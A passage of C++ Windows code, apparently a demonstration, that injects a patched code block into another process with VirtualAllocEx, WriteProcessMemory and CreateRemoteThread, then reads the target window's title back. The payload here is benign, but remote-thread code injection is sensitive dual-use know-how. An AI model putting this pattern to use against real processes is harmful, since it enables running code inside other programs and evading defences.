#endif
dwCodeLen = dwEndReadAddr - dwSpyRealAddr;
LPBYTE pCode = (LPBYTE)VirtualAllocEx(hProcess, 0, dwCodeLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
LPBYTE pCodeBuff = (LPBYTE)malloc(dwCodeLen);
memcpy((LPVOID)pCodeBuff, (LPVOID)dwSpyRealAddr, dwCodeLen);
// 调整代码
LPBYTE p = pCodeBuff;
while(*p != 0xE8){p++;}
*(DWORD*)(p+1) = (DWORD)&GetWindowText - (DWORD)(p - (LPBYTE)pCodeBuff + (LPBYTE)pCode) - 5;
WriteProcessMemory( hProcess, pCode, pCodeBuff, dwCodeLen, NULL);
HANDLE hRThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pCode, pData, 0, 0);
WaitForSingleObject(hRThread, INFINITE);
char szTitle[100] = {0};
DWORD dwReadBytes = 0;
ReadProcessMemory(hProcess, pData + 8, szTitle, dwTitleSize, &dwReadBytes);
cout << szTitle << endl;
CloseHandle(hRThread);
free(pCodeBuff);
VirtualFreeEx(hProcess, pCode, dwCodeLen, MEM_RELEASE);
VirtualFreeEx(hProcess, pData, dwDataLen, MEM_RELEASE);
CloseHandle(hProcess);
}